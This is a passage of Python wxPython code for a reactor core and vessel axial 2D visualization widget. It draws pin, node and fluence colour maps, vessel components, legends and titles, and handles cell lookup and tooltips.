)
title_templ, title_size = self._CreateTitleTemplate2(
font, self.curDataSet, dset_shape, self.state.timeDataSet,
additional = addresses
)
node_value_draw_list = []
# -- Create image
# --
bmap, dc = self._CreateEmptyBitmapAndDC( im_wd, im_ht )
gc = self._CreateGraphicsContext( dc )
trans_brush = self._CreateTransparentBrush( gc )
trans_color_arr = np.array([ 0, 0, 0, 0 ], dtype = np.uint8 )
glabel_font = gc.CreateFont( label_font, wx.BLACK )
if self.showLabels:
#gc.SetFont( glabel_font )
yfont_size = int( math.floor( font_size * 0.6 ) )
gylabel_font = Widget.CopyFont( value_font, pt_size = yfont_size )
gc.SetFont( gylabel_font )
assy_pen = gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( 155, 155, 155, 255 ), 1, wx.PENSTYLE_SOLID
) )
node_pen = gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( 100, 100, 100, 255 ), 1, wx.PENSTYLE_SOLID
) )
colors = mapper.to_rgba( dset_array, bytes = True )
if item_factors is not None:
colors[ item_factors == 0 ] = trans_color_arr
colors[ np.isnan( dset_array ) ] = trans_color_arr
colors[ np.isinf( dset_array ) ] = trans_color_arr
# -- Loop on axial levels
# --
last_axial_label_y = 0
axial_y = core_region[ 1 ]
for ax in xrange( len( axial_levels_dy ) - 1, -1, -1 ):
cur_dy = axial_levels_dy[ ax ]
axial_level = ax + self.cellRange[ 1 ]
# -- Row label
# --
if self.showLabels and cur_dy > 1:
label = '{0:02d}'.format( axial_level + 1 )
#label_size = ylabel_font.getsize( label )
label_size = gc.GetFullTextExtent( label )
label_y = axial_y + ((cur_dy - label_size[ 1 ]) / 2.0)
if (last_axial_label_y + label_size[ 1 ] + 1) < (axial_y + cur_dy):
gc.SetFont( gylabel_font )
gc.DrawText( label, 1 ,label_y )
last_axial_label_y = axial_y
#end if self.showLabels and cur_dy > 1
# -- Loop on horizontal assemblies/pins
# --
pin_x = core_region[ 0 ]
pin_col_f = self.cellRange[ 0 ] * core.npinx
pin_row_f = self.cellRange[ 0 ] * core.npiny
if core_offset_cm > 0:
pin_x += assy_wd >> 1
pin_col_f += core.npinx >> 1
pin_row_f += core.npiny >> 1
pin_col_incr_f = \
(npinx_cos_theta * self.cellRange[ -2 ]) / pin_eff_count
pin_row_incr_f = \
(npiny_sin_theta * self.cellRange[ -2 ]) / pin_eff_count
if self.logger.isEnabledFor( logging.DEBUG ) and \
ax == len( axial_levels_dy ) - 1:
self.logger.debug(
'pin_col_f=%f, pin_row_f=%f\n' +
'pin_col_incr_f=%f, pin row_incr_f=%f',
pin_col_f, pin_row_f, pin_col_incr_f, pin_row_incr_f
)
for i in xrange( pin_eff_count ):
#xxxxx
# -- Column/row label
## if ax == len( axial_levels_dy ) - 1 and self.showLabels:
## label_ndx = 0 if self.mode == 'xz' else 1
## label = core.GetCoreLabel( label_ndx, assy_col )
## label_size = gc.GetFullTextExtent( label )
## label_x = assy_x + ((assy_wd - label_size[ 0 ]) / 2.0)
## gc.SetFont( glabel_font )
## gc.DrawText( label, label_x, 1 )
## #end if writing column label
pin_col = int( pin_col_f )
pin_row = int( pin_row_f )
assy_col_raw = (pin_col // core.npinx)
assy_row_raw = (pin_row // core.npiny)
assy_col = min( assy_col_raw, core.coreMap.shape[ 1 ] - 1 )
assy_row = min( assy_row_raw, core.coreMap.shape[ 0 ] - 1 )
assy_ndx = core.coreMap[ assy_row, assy_col ] - 1
assy_pin_col = pin_col % core.npinx
assy_pin_row = pin_row % core.npiny
if _DEBUG_ and self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'i=%d: pin_x=%d\n pin_col=%d, pin_row=%d\n' +
' assy_col_raw=%d, assy_row_raw=%d, assy_col=%d, assy_row=%d\n' +
' assy_pin_col=%d, assy_pin_row=%d',
i, pin_x, pin_col, pin_row,
assy_col_raw, assy_row_raw, assy_col, assy_row,
assy_pin_col, assy_pin_row
)
if self.nodalMode:
node_col = assy_pin_col // (core.npinx >> 1)
node_row = assy_pin_row // (core.npiny >> 1)
if node_col > 0:
node_ndx = 3 if node_row > 0 else 1
else:
node_ndx = 2 if node_row > 0 else 0
#value = dset_array[ 0, node_ndx, axial_level, assy_ndx ]
cur_color = colors[ 0, node_ndx, axial_level, assy_ndx ]
if cur_color[ 3 ] > 0:
brush_color = pen_color = cur_color.tolist()
gc.SetPen( gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( *pen_color ), 1, wx.PENSTYLE_SOLID
) ) )
gc.SetBrush( gc.CreateBrush(
wx.TheBrushList.FindOrCreateBrush(
wx.Colour( *brush_color ), wx.BRUSHSTYLE_SOLID
)
) )
gc.DrawRectangle( node_x, axial_y, node_wd + 1, cur_dy + 1 )
node_value_draw_list.append((
self._CreateValueString( value ),
Widget.GetContrastColor( *brush_color ),
node_x, axial_y, node_wd, cur_dy
))
#end if cur_color[ 3 ] > 0
#else:
elif assy_pin_col < dset_shape[ 1 ] and assy_pin_row < dset_shape[ 0 ]:
cur_color = \
colors[ assy_pin_row, assy_pin_col, axial_level, assy_ndx ]
if cur_color[ 3 ] > 0:
brush_color = pen_color = cur_color.tolist()
gc.SetPen( gc.CreatePen( wx.ThePenList.FindOrCreatePen(
wx.Colour( *pen_color ), 1, wx.PENSTYLE_SOLID
) ) )
gc.SetBrush( gc.CreateBrush(
wx.TheBrushList.FindOrCreateBrush(
wx.Colour( *brush_color ), wx.BRUSHSTYLE_SOLID
)
) )
gc.DrawRectangle( pin_x, axial_y, pin_wd, cur_dy )
#end if cur_color[ 3 ] > 0
#end elif assy_pin_col < dset_shape[ 1 ] and ...
pin_x += pin_wd
pin_col_f += pin_col_incr_f
pin_row_f += pin_row_incr_f
#end for i in xrange( pin_eff_count )
axial_y += cur_dy
#end for ax
# -- Draw values
# --
if node_value_draw_list:
self._DrawValuesWx( node_value_draw_list, gc )
# -- Draw vessel components and fluence
# --
if fluence_ds_range is not None:
self._DrawVesselComponents( gc, config, tuple_in )
# -- Draw Legend Image
# --
if legend_bmap is not None:
gc.DrawBitmap(
legend_bmap,
vessel_region[ 0 ] + vessel_region[ 2 ] + 2 + font_size, 2,
legend_bmap.GetWidth(), legend_bmap.GetHeight()
)
else:
legend_size = ( 0, 0 )
if fluence_legend_bmap is not None:
at = (
vessel_region[ 0 ] + vessel_region[ 2 ] + 2 + font_size +
legend_size[ 0 ],
2 # vessel_region[ 1 ]
)
gc.DrawBitmap(
fluence_legend_bmap, at[ 0 ], at[ 1 ],
fluence_legend_bmap.GetWidth(), fluence_legend_bmap.GetHeight()
)
else:
fluence_legend_size = ( 0, 0 )
# -- Draw Title String
# --
#axial_y = max( axial_y, legend_size[ 1 ], fluence_legend_size[ 1 ] )
axial_y = max(
axial_y,
vessel_region[ 1 ] + vessel_region[ 3 ],
legend_size[ 1 ], fluence_legend_size[ 1 ]
)
axial_y += font_size >> 2
title_str = self._CreateTitleString(
title_templ,
time = self.timeValue
)
gc.SetFont( glabel_font )
self._DrawStringsWx(
gc, font,
( title_str, ( 0, 0, 0, 255 ),
vessel_region[ 0 ], axial_y,
#vessel_region[ 2 ] - vessel_region[ 0 ],
im_wd - vessel_region[ 0 ] - (font_size << 2),
'c' )
)
# -- Draw vessel fluence values
# --
if fluence_ds_range is not None and \
self.fluenceAddr.dataSetName is not None:
self._DrawFluenceCells( gc, config, tuple_in )
# -- Finished
# --
dc.SelectObject( wx.NullBitmap )
#end if config exists
#elapsed_time = timeit.default_timer() - start_time
#if self.logger.isEnabledFor( logging.DEBUG ):
#self.logger.debug( 'time=%.3fs, im-None=%s', elapsed_time, im is None )
return bmap if bmap is not None else self.emptyBitmap
#end _CreateRasterImage
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateStateTuple() -
#----------------------------------------------------------------------
def _CreateStateTuple( self ):
"""Create tuple that is used for comparison in IsTupleCurrent().
#m @return state_index, assy_col_or_row, pin_col_or_row, theta_ndx
@return state_index, theta_ndx
"""
#m th = self.fluenceAddr.thetaIndex
#m if self.mode == 'xz':
#m t = ( self.stateIndex, self.assemblyAddr[ 2 ], self.subAddr[ 1 ], th )
#m else:
#m t = ( self.stateIndex, self.assemblyAddr[ 1 ], self.subAddr[ 0 ], th )
t = ( self.stateIndex, self.fluenceAddr.thetaIndex )
return t
#end _CreateStateTuple
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateToolTipText() -
#----------------------------------------------------------------------
def _CreateToolTipText( self, cell_info ):
"""Create a tool tip.
@param cell_info tuple returned from FindCell()
( axial_level, assy_ndx, assy_col, assy_row, pin_col, pin_row, node_addr )
"""
tip_str = ''
dset = None
valid = False
if cell_info is not None and \
self.dmgr.IsValid( self.curDataSet, axial_level = cell_info[ 0 ] ):
dset = self.dmgr.GetH5DataSet( self.curDataSet, self.timeValue )
if dset is not None:
core = self.dmgr.GetCore()
assy_addr = self.dmgr.NormalizeAssemblyAddr( cell_info[ 1 : 4 ] )
assy_addr_str = core.CreateAssyLabel( *assy_addr[ 1 : 3 ] )
tip_str = 'Assy: ' + assy_addr_str
axial_value = self.dmgr.\
GetAxialValue( self.curDataSet, core_ndx = cell_info[ 0 ] )
tip_str += ', Axial: {0:.2f}'.format( axial_value.cm )
#end if dset is not None and assy_ndx < dset.shape[ 3 ]
return tip_str
#end _CreateToolTipText
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateToolTipText() -
#----------------------------------------------------------------------
#m def _CreateToolTipText( self, cell_info ):
#m """Create a tool tip.
#m@param cell_info tuple returned from FindCell()
#m"""
#m tip_str = ''
#m dset = None
#m valid = False
#m
#m if cell_info is not None:
#m valid = self.dmgr.IsValid(
#m self.curDataSet,
#m assembly_index = cell_info[ 0 ],
#m axial_level = cell_info[ 2 ]
#m )
#m
#m if valid:
#m dset = self.dmgr.GetH5DataSet( self.curDataSet, self.timeValue )
#m
#m if dset is not None and assy_ndx < dset.shape[ 3 ]:
#m core = self.dmgr.GetCore()
#m if self.mode == 'xz':
#m assy_addr = ( cell_info[ 1 ], self.assemblyAddr[ 2 ] )
#m else:
#m assy_addr = ( self.assemblyAddr[ 1 ], cell_info[ 1 ] )
#m
#m assy_addr_str = core.CreateAssyLabel( *assy_addr )
#m tip_str = 'Assy: ' + assy_addr_str
#m
#m if cell_info[ 2 ] >= 0:
#m axial_value = self.dmgr.\
#m GetAxialValue( self.curDataSet, core_ndx = cell_info[ 2 ] )
#m tip_str += ', Axial: {0:.2f}'.format( axial_value.cm )
#m #end if dset is not None and assy_ndx < dset.shape[ 3 ]
#m
#m return tip_str
#m #end _CreateToolTipText
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._DrawFluenceCells() -
#----------------------------------------------------------------------
def _DrawFluenceCells( self, gc, config, tuple_in ):
"""Handles drawing fluence data.
@param im_draw PIL.ImageDraw instance
@param config draw configuration dict
@param tuple_in state tuple ( state_index, theta_ndx )
"""
theta_ndx = tuple_in[ 1 ]
dset = None
core = self.dmgr.GetCore()
ds_range = config.get( 'fluenceDataRange' )
if theta_ndx >= 0 and ds_range is not None:
dset = \
self.dmgr.GetH5DataSet( self.fluenceAddr.dataSetName, self.timeValue )
if dset is not None and core is not None:
amode = gc.GetAntialiasMode()
cmode = gc.GetCompositionMode()
gc.SetAntialiasMode( wx.ANTIALIAS_NONE ) # _DEFAULT
gc.SetCompositionMode( wx.COMPOSITION_SOURCE ) # _OVER
theta_ndx = min( theta_ndx, dset.shape[ 1 ] - 1 )
dset_array = np.array( dset )
value_delta = ds_range[ 1 ] - ds_range[ 0 ]
ax_ranges = self._GetAxialRanges()
core_bottom_cm = ax_ranges.get( 'cm_bottom' )
#core_axial_dy = config[ 'coreAxialDy' ]
core_region = config[ 'coreRegion' ]
#x liner_r = config[ 'linerRadius' ]
pix_per_cm = config[ 'pixPerCm' ]
r_start_ndx = config[ 'radiusStartIndex' ]
fluence_axials_dy = config[ 'fluenceAxialLevelsDy' ]
fluence_axial_offset_pix = config[ 'fluenceAxialOffsetPix' ]
fluence_mapper = config[ 'fluenceMapper' ]
vessel_region = config[ 'vesselRegion' ]
vessel_origin = vessel_region[ 0 : 2 ]
vessel_origin[ 1 ] += fluence_axial_offset_pix
if config.get( 'coreOffsetCm', 0 ) > 0:
assy_wd = config[ 'assemblyWidth' ]
vessel_origin[ 0 ] += assy_wd >> 1
#vessel_origin[ 1 ] += assy_wd >> 1
max_axial_y = vessel_origin[ 1 ] + config[ 'fluenceAxialDy' ]
trans_color_arr = np.array([ 0, 0, 0, 0 ], dtype = np.uint8 )
# Can't do this here b/c to_rgba() treats ndim == 3 or 4 as image
# cur_array = dset_array[ :, :, : ]
# colors = fluence_mapper.to_rgba( cur_array, bytes = True )
# colors[ np.isnan( cur_array ) ] = trans_color_arr
# colors[ np.isinf( cur_array ) ] = trans_color_arr
# -- Outer loop is r
# --
for ri in xrange( r_start_ndx, core.fluenceMesh.nr ):
if ri == r_start_ndx:
r1_wd = int( math.ceil( core.fluenceMesh.r[ ri ] * pix_per_cm ) )
r2_wd = int( math.ceil( core.fluenceMesh.r[ ri + 1 ] * pix_per_cm ) )
#cur_r = (r1_wd + r2_wd) >> 1
cur_r = r2_wd
cur_wd = max( 1, r2_wd - r1_wd + 1 )
cur_array = dset_array[ :, :, ri ]
colors = fluence_mapper.to_rgba( cur_array, bytes = True )
colors[ np.isnan( cur_array ) ] = trans_color_arr
colors[ np.isinf( cur_array ) ] = trans_color_arr
# -- Inner loop is z
# --
axial_y = vessel_origin[ 1 ]
axial_cm = ax_ranges.get( 'cm_top' )
for ax in xrange( len( fluence_axials_dy ) - 1, -1, -1 ):
cur_dy = fluence_axials_dy[ ax ]
cur_color = colors[ ax, theta_ndx ]
if cur_color[ 3 ] > 0:
pen_color = cur_color.tolist()
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + cur_r, axial_y )
path.AddLineToPoint(
vessel_origin[ 0 ] + cur_r,
min( axial_y + cur_dy, max_axial_y )
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( *pen_color ), cur_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end if not self.dmgr.IsBadValue( value )
axial_y += cur_dy
#end for ax in xrange( len( fluence_axial_levels_dy ) - 1, -1, -1 )
r1_wd = r2_wd
#end for ri
gc.SetAntialiasMode( amode )
gc.SetCompositionMode( cmode )
#end if dset
#end _DrawFluenceCells
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._DrawVesselComponents() -
#----------------------------------------------------------------------
def _DrawVesselComponents( self, gc, config, tuple_in ):
"""Handles drawing vessel components from the vessel definition
@param gc wx.GraphicsContext instance
@param config draw configuration dict
@param tuple_in state tuple ( state_index, theta_ndx )
"""
core = self.dmgr.GetCore()
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug( 'config\n%s', str( config ) )
theta_rad = core.fluenceMesh.GetThetaRads( tuple_in[ 1 ] )
theta_deg = theta_rad * 180.0 / math.pi
assy_wd = config[ 'assemblyWidth' ]
core_axial_dy = config[ 'coreAxialDy' ]
axial_levels_dy = config[ 'coreAxialLevelsDy' ]
core_axial_offset_pix = config[ 'coreAxialOffsetPix' ]
core_region = config[ 'coreRegion' ]
pin_cm = config[ 'pinCm' ]
pix_per_cm = config[ 'pixPerCm' ]
fluence_axial_dy = config[ 'fluenceAxialDy' ]
fluence_axial_offset_pix = config[ 'fluenceAxialOffsetPix' ]
vessel_region = config[ 'vesselRegion' ]
# -- Barrel
# --
barrel_r = config[ 'barrelRadius' ]
barrel_wd = config[ 'barrelWidth' ]
barrel_r += (barrel_wd >> 1)
liner_r = config[ 'linerRadius' ]
vessel_r = config[ 'vesselRadius' ]
vessel_wd = vessel_r - (liner_r + 1)
vessel_r = liner_r + 1 + (vessel_wd >> 1)
core_origin = core_region[ 0 : 2 ]
vessel_origin = vessel_region[ 0 : 2 ]
vessel_origin[ 1 ] += fluence_axial_offset_pix
if config.get( 'coreOffsetCm', 0 ) > 0:
core_origin[ 0 ] += assy_wd >> 1
vessel_origin[ 0 ] += assy_wd >> 1
#vessel_origin[ 1 ] += assy_wd >> 1
# -- Baffle
# --
if core.coreSym == 4:
baffle_wd = config[ 'baffleWidth' ]
cur_dx = core_region[ 2 ] + 1
path = gc.CreatePath()
# axial_y = core_region[ 1 ]
# for ax in range( len( axial_levels_dy ) - 1, -1, -1 ):
# cur_dy = axial_levels_dy[ ax ]
# if cur_dy > 0:
# axial_y += cur_dy
# #end if cur_dy > 0
#end for ax
path.MoveToPoint( core_region[ 0 ] + cur_dx, core_region[ 1 ] )
#path.AddLineToPoint( core_region[ 0 ] + cur_dx, axial_y )
path.AddLineToPoint(
core_region[ 0 ] + cur_dx, core_region[ 1 ] + core_axial_dy
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 155, 155, 155, 255 ), baffle_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end if core.coreSym == 4
# -- Barrel
# --
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + barrel_r, core_region[ 1 ] )
path.AddLineToPoint(
vessel_origin[ 0 ] + barrel_r,
core_region[ 1 ] + core_axial_dy
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 200, 200, 200, 255 ), barrel_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
# -- Pad
# --
pad_wd = config[ 'padWidth' ]
if pad_wd > 0:
show_pad = False
pad_angles = config[ 'padAngles' ]
if len( pad_angles ) > 0:
pad_arc_half = config[ 'padArc' ] / 2.0
for an in pad_angles:
if theta_deg >= an - pad_arc_half and theta_deg <= an + pad_arc_half:
show_pad = True
break
#end for an
#end if pad_angles
if show_pad:
pad_r = config[ 'padRadius' ] + (pad_wd >> 1)
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + pad_r, core_region[ 1 ] )
path.AddLineToPoint(
vessel_origin[ 0 ] + pad_r,
core_region[ 1 ] + core_axial_dy
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 175, 175, 175, 255 ), pad_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end if show_pad
#end if self.vesselShowPad
# -- Vessel ring
# --
path = gc.CreatePath()
vx = vessel_origin[ 0 ] + vessel_r
path.MoveToPoint( vx, vessel_origin[ 1 ] )
#path.AddLineToPoint( vx, vessel_origin[ 1 ] + vessel_region[ 3 ] )
path.AddLineToPoint( vx, vessel_origin[ 1 ] + fluence_axial_dy )
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 175, 175, 175, 255 ), vessel_wd, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
# -- Liner
# --
path = gc.CreatePath()
path.MoveToPoint( vessel_origin[ 0 ] + liner_r, vessel_origin[ 1 ] )
path.AddLineToPoint(
vessel_origin[ 0 ] + liner_r,
vessel_origin[ 1 ] + fluence_axial_dy
#vessel_origin[ 1 ] + vessel_region[ 3 ]
)
cur_pen = wx.ThePenList.FindOrCreatePen(
wx.Colour( 0, 0, 0, 255 ), 1, wx.PENSTYLE_SOLID
)
cur_pen.SetCap( wx.CAP_BUTT )
gc.SetPen( gc.CreatePen( cur_pen ) )
gc.StrokePath( path )
#end _DrawVesselComponents
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.FindCell() -
#----------------------------------------------------------------------
def FindCell( self, ev_x, ev_y ):
"""
:returns: ( axial_level, assy_ndx, assy_col, assy_row, pin_col, pin_row,
node_addr )
"""
result = core = None
if self.config is not None and self.dmgr is not None and \
'coreOffsetCm' in self.config:
core = self.dmgr.GetCore()
in_region_flag = False
if core is not None and core.coreMap is not None:
core_region = self.config[ 'coreRegion' ]
if ev_x >= core_region[ 0 ] and ev_y >= core_region[ 1 ] and \
ev_x <= core_region[ 0 ] + core_region[ 2 ] and \
ev_y <= core_region[ 1 ] + core_region[ 3 ]:
in_region_flag = True
#if core is not None and core.coreMap is not None:
if in_region_flag:
assy_wd = self.config[ 'assemblyWidth' ]
core_axials_dy = self.config[ 'coreAxialLevelsDy' ]
core_offset_cm = self.config[ 'coreOffsetCm' ]
npin = self.config[ 'npin' ]
npinx_cos_theta = self.config[ 'npinxCosTheta' ]
npiny_sin_theta = self.config[ 'npinySinTheta' ]
pin_wd = self.config[ 'pinWidth' ]
theta_cos = self.config[ 'thetaCos' ]
theta_sin = self.config[ 'thetaSin' ]
node_addr = -1
# -- Total pins, effectively
pin_eff_count = self.cellRange[ -2 ] * npin
off_x = ev_x - core_region[ 0 ]
off_y = ev_y - core_region[ 1 ]
if core_offset_cm > 0:
off_x -= assy_wd >> 1
pin_eff_count -= npin >> 1
axial_level = 0
ax_y = 0
for ax in range( len( core_axials_dy ) -1, -1, -1 ):
ax_y += core_axials_dy[ ax ]
if off_y <= ax_y:
axial_level = ax + self.cellRange[ 1 ]
break
horz_factor = float( off_x ) / core_region[ 2 ]
#pin_col = int( horz_factor * npinx_cos_theta * core.npinx )
#pin_row = int( horz_factor * npiny_sin_theta * core.npiny )
pin_col = int( horz_factor * theta_cos * pin_eff_count )
pin_col = max( 0, min( pin_col, pin_eff_count - 1 ) )
pin_row = int( horz_factor * theta_sin * pin_eff_count )
pin_row = max( 0, min( pin_row, pin_eff_count - 1 ) )
assy_col_raw = (pin_col // core.npinx) + self.cellRange[ 0 ]
assy_row_raw = (pin_row // core.npiny) + self.cellRange[ 0 ]
assy_col = min( assy_col_raw, core.coreMap.shape[ 1 ] - 1 )
assy_row = min( assy_row_raw, core.coreMap.shape[ 0 ] - 1 )
assy_ndx = core.coreMap[ assy_row, assy_col ] - 1
assy_pin_col = pin_col % core.npinx
assy_pin_row = pin_row % core.npiny
if _DEBUG_ and self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'off_x=%d/%d, pin_eff_count=%d, horz_factor=%f\n pin_col=%d, pin_row=%d\n' +
' assy_col_raw=%d, assy_row_raw=%d, assy_col=%d, assy_row=%d\n' +
' assy_pin_col=%d, assy_pin_row=%d',
off_x, core_region[ 2 ], pin_eff_count, horz_factor,
pin_col, pin_row,
assy_col_raw, assy_row_raw, assy_col, assy_row,
assy_pin_col, assy_pin_row
)
if self.nodalMode:
node_col = assy_pin_col // (core.npinx >> 1)
node_row = assy_pin_row // (core.npiny >> 1)
if node_col > 0:
node_addr = 3 if node_row > 0 else 1
else:
node_addr = 2 if node_row > 0 else 0
result = (
axial_level, assy_ndx, assy_col, assy_row,
assy_pin_col, assy_pin_row, node_addr
)
#end if core is not None and core.coreMap is not None
return result
#end FindCell
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.FindCell() -
#----------------------------------------------------------------------
#m def FindCell( self, ev_x, ev_y ):
#m """
#m@return ( assy_ndx, assy_col_or_row, axial_level, pin_col_or_row, node_addr )
#m"""
#m result = core = None
#m
#m if self.config is not None and self.dmgr is not None:
#m core = self.dmgr.GetCore()
#m
#m if core is not None and core.coreMap is not None:
#m assy_wd = self.config[ 'assemblyWidth' ]
#m axials_dy = self.config[ 'axialLevelsDy' ]
#m core_region = self.config[ 'coreRegion' ]
#m node_addr = -1
#m
#m off_x = ev_x - core_region[ 0 ]
#m off_y = ev_y - core_region[ 1 ]
#m
#m if self.mode == 'xz':
#m assy_row = self.assemblyAddr[ 2 ]
#m assy_col = min(
#m int( off_x / assy_wd ) + self.cellRange[ 0 ],
#m self.cellRange[ 2 ] - 1
#m )
#m assy_col = max( assy_col, self.cellRange[ 0 ] )
#m assy_col_or_row = assy_col
#m
#m pin_offset = off_x % assy_wd
#m if self.nodalMode:
#m pin_col_or_row, node_addr = self._FindPinNodal( pin_offset )
#m else:
#m pin_col_or_row = self._FindPinNonNodal( pin_offset )
#m max_col_or_row = core.npinx + 1 if self.channelMode else core.npinx
#m if pin_col_or_row >= max_col_or_row: pin_col_or_row = -1
#m
#m else:
#m assy_col = self.assemblyAddr[ 1 ]
#m assy_row = min(
#m int( off_y / assy_wd ) + self.cellRange[ 0 ],
#m self.cellRange[ 2 ] - 1
#m )
#m assy_row = max( assy_row, self.cellRange[ 0 ] )
#m assy_col_or_row = assy_row
#m
#m pin_offset = off_x % assy_wd
#m if self.nodalMode:
#m pin_col_or_row, node_addr = self._FindPinNodal( pin_offset )
#m else:
#m pin_col_or_row = self._FindPinNonNodal( pin_offset )
#m max_col_or_row = core.npiny + 1 if self.channelMode else core.npiny
#m if pin_col_or_row >= max_col_or_row: pin_col_or_row = -1
#m #end if-else self.mode
#m
#m axial_level = 0
#m ax_y = 0
#m for ax in range( len( axials_dy ) -1, -1, -1 ):
#m ax_y += axials_dy[ ax ]
#m if off_y <= ax_y:
#m axial_level = ax + self.cellRange[ 1 ]
#m break
#m
#m assy_ndx = core.coreMap[ assy_row, assy_col ] - 1
#m result = \
#m ( assy_ndx, assy_col_or_row, axial_level, pin_col_or_row, node_addr )
#m #end if core is not None and core.coreMap is not None
#m
#m return result
#m #end FindCell
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetAnimationIndexes() -
#----------------------------------------------------------------------
def GetAnimationIndexes( self ):
"""Accessor for the list of indexes over which this widget can be
animated. Possible values are 'axial:detector', 'axial:pin', 'statepoint'.
@return list of indexes or None
"""
return ( 'statepoint', )
#end GetAnimationIndexes
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._GetAxialRanges() -
#----------------------------------------------------------------------
def _GetAxialRanges( self, *types ):
"""Resolves the axial range in the core.fluenceMesh.z that should be
displayed against the current vertical zoom level (which we don't currently do) and the non-fluence dataset axial mesh.
Args:
types (list): 'core', 'fluence'
Returns:
dict: keys
cm_bottom: bottom level in cm
cm_top: top level in cm
core_bottom_ndx: core bottom index (if ``types`` includes 'core')
core_top_ndx: core top index (if ``types`` includes 'core')
fluence_bottom_ndx: fluence bottom index
(if ``types`` includes 'fluence')
fluence_top_ndx: fluence top index
(if ``types`` includes 'fluence')
"""
core = self.dmgr.GetCore()
axial_mesh = self.dmgr.GetAxialMesh2( mesh_type = 'all' )
# core_axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet, 'pin' )
# fluence_axial_mesh = self.dmgr.GetAxialMesh2( self.fluenceAddr.dataSetName, 'fluence' )
#top_ndx = min( self.cellRange[ 3 ] - 1, len( axial_mesh ) - 1 )
top_ndx = min( self.cellRange[ 3 ], len( axial_mesh ) - 1 )
bottom_ndx = max( self.cellRange[ 1 ], 0 )
cm_top = axial_mesh[ top_ndx ]
cm_bottom = axial_mesh[ bottom_ndx ]
result = { 'cm_bottom': cm_bottom, 'cm_top': cm_top }
if types:
if 'core' in types:
core_axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet, 'pin' )
result[ 'core_bottom_ndx' ] = \
self.dmgr.GetAxialMeshIndex( cm_bottom, self.curDataSet, 'pin' )
result[ 'core_top_ndx' ] = \
self.dmgr.GetAxialMeshIndex( cm_top, self.curDataSet, 'pin' )
if 'fluence' in types:
fluence_axial_mesh = self.dmgr.\
GetAxialMesh2( self.fluenceAddr.dataSetName, 'fluence' )
result[ 'fluence_bottom_ndx' ] = self.dmgr.GetAxialMeshIndex(
cm_bottom, self.fluenceAddr.dataSetName, 'fluence'
)
result[ 'fluence_top_ndx' ] = self.dmgr.\
GetAxialMeshIndex( cm_top, self.fluenceAddr.dataSetName, 'fluence' )
#end if types
return result
#end _GetAxialRanges
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetDataSetTypes() -
#----------------------------------------------------------------------
def GetDataSetTypes( self ):
#return [ 'channel', 'pin', ':assembly', ':node' ]
return [ 'channel', 'pin', ':assembly' ]
#end GetDataSetTypes
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetEventLockSet() -
#----------------------------------------------------------------------
def GetEventLockSet( self ):
"""
"""
locks = set([
STATE_CHANGE_axialValue,
STATE_CHANGE_coordinates,
STATE_CHANGE_curDataSet,
STATE_CHANGE_fluenceAddr,
STATE_CHANGE_scaleMode,
STATE_CHANGE_timeValue
])
# STATE_CHANGE_stateIndex
return locks
#end GetEventLockSet
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetInitialCellRange() -
#----------------------------------------------------------------------
def GetInitialCellRange( self ):
"""Creates the range using y for the axial.
@return ( xy-left, z-bottom, xy-right+1, z-top+1, d-xy, dz )
"""
core = None
if self.dmgr is not None:
core = self.dmgr.GetCore()
if core is None:
result = ( 0, 0, 0, 0, 0, 0 )
else:
result = list( self.dmgr.ExtractSymmetryExtent() )
result[ 1 ] = 0
#mesh = self.dmgr.GetAxialMeshCenters2( self.curDataSet )
mesh = self.dmgr.GetAxialMeshCenters2( mesh_type = 'all' )
result[ 3 ] = result[ 5 ] = len( mesh )
return result
#end GetInitialCellRange
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetPrintFontScale() -
#----------------------------------------------------------------------
def GetPrintFontScale( self ):
"""
@return 1.0
"""
return 1.0
#end GetPrintFontScale
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.GetSpecialDataSetTypes() -
#----------------------------------------------------------------------
def GetSpecialDataSetTypes( self ):
"""Accessor specifying the types of special datasets which can be
processed in this widget. For now this is limited to 'fluence'.
@return [ 'fluence' ]
"""
return [ 'fluence' ]
#end GetSpecialDataSetTypes
